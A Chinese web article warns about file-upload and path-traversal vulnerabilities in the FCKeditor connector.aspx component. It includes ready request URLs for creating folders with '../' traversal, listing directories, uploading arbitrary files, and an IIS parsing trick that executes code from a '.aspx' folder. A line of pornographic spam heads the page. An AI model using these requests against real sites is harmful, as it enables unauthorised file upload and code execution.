欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

FCKeditor 新聞組件的一些程序漏洞

 更新時間:2009年04月28日 20:14:44   作者:  
很多網(wǎng)站可能都在用FCK的新聞編輯組件,使用FCK的時候一定要注意版本是否安全,以下是FCK中的文件上傳漏洞:(主要是:connector.aspx文件的漏洞)
1 CurrentFolder 參數(shù),可以在網(wǎng)站中不同目錄新建文件夾,參數(shù)使用 ../../來篡改參數(shù),進(jìn)入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp


2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進(jìn)入不同的目錄,讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

3 上傳文件時,通過修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數(shù),可以上傳任意類型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。

相關(guān)文章

  • 比較不錯的修改FCKEditor的修改方法

    比較不錯的修改FCKEditor的修改方法

    比較不錯的修改FCKEditor的修改方法...
    2007-11-11
  • fckeditor 代碼語法高亮

    fckeditor 代碼語法高亮

    這兩個星期有點空,就再研究了一下語法高亮的問題,找了一下FCKeditor官方網(wǎng)站,發(fā)現(xiàn)2.5.1穩(wěn)定版已經(jīng)出來了,首先替換掉舊的2.0。呵呵,我喜歡使用新版。
    2009-06-06
  • javascript 網(wǎng)頁編輯框及拖拽圖片的問題

    javascript 網(wǎng)頁編輯框及拖拽圖片的問題

    javascript 網(wǎng)頁編輯框及拖拽圖片的問題,需要的朋友可以參考下。
    2009-12-12
  • 幾款好用的前端開發(fā)編輯器推薦安利

    幾款好用的前端開發(fā)編輯器推薦安利

    這篇文章主要為大家介紹了幾款好用的前端編輯器,還在因為只知道一個編輯器被同事嘲笑嗎?看完給他上一課?。?!建議讀者朋友們收藏,總有一款適合你
    2021-10-10
  • FCKeditor ASP.NET 上傳附件研究

    FCKeditor ASP.NET 上傳附件研究

    FCKeditor很好用,而且是開源軟件。最近研究了一下自帶的上傳功能,對源代碼作了一點修改,也算是依照開源軟件的要求,介紹一下。
    2009-06-06
  • asp.net CKEditor和CKFinder的應(yīng)用

    asp.net CKEditor和CKFinder的應(yīng)用

    CKEditor和CKFinder在ASP.NET中的應(yīng)用,需要的朋友可以參考下。
    2010-01-01
  • 針對PHP環(huán)境下Fckeditor編輯器上傳圖片配置詳細(xì)教程

    針對PHP環(huán)境下Fckeditor編輯器上傳圖片配置詳細(xì)教程

    今天介紹Fckeditor上傳圖片功能在PHP中的配置方法,涉及Fckeditor上傳圖片的上傳路徑配置、限制Fckeditor上傳圖片大小設(shè)置、Fckeditor上傳圖片文件名重名及亂碼解決方法以及針對上傳圖片添加水印功能的實現(xiàn)方法,只要掌握了以上四點,F(xiàn)ckeditor在大部分PHP類型網(wǎng)站中的應(yīng)用都能解決
    2014-04-04
  • asp.net 為FCKeditor開發(fā)代碼高亮插件實現(xiàn)代碼

    asp.net 為FCKeditor開發(fā)代碼高亮插件實現(xiàn)代碼

    昨天已經(jīng)將BlogEngine的可視化編輯器換成了FCKeditor,作為一個程序員,在博客中插入代碼是很重要的一塊。網(wǎng)上現(xiàn)有的都是修改FCKeditor的fckeditorcode_gecko.js和fckeditorcode_ie.js以達(dá)到InsertCode的目的。這個方法非常麻煩,當(dāng)要使用FCKeditor新版本時都要重新修改這兩個文件,非常影響我們的效率。
    2008-08-08
  • ASP FCKeditor在線編輯器使用方法

    ASP FCKeditor在線編輯器使用方法

    我用的是asp,FCKeditor沒有使用幫助,網(wǎng)上google以下資料很多,但不是很全,不適合剛?cè)腴T的菜鳥使用,通過我半天的使用經(jīng)歷,稍微做了些整理,便于大家學(xué)習(xí).
    2009-12-12
  • ckeditor自定義插件使用方法詳解

    ckeditor自定義插件使用方法詳解

    ckeditor是一款功能強大的富文本編輯工具,這篇文章主要為大家詳細(xì)介紹了ckeditor自定義插件的使用方法,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2016-12-12

最新評論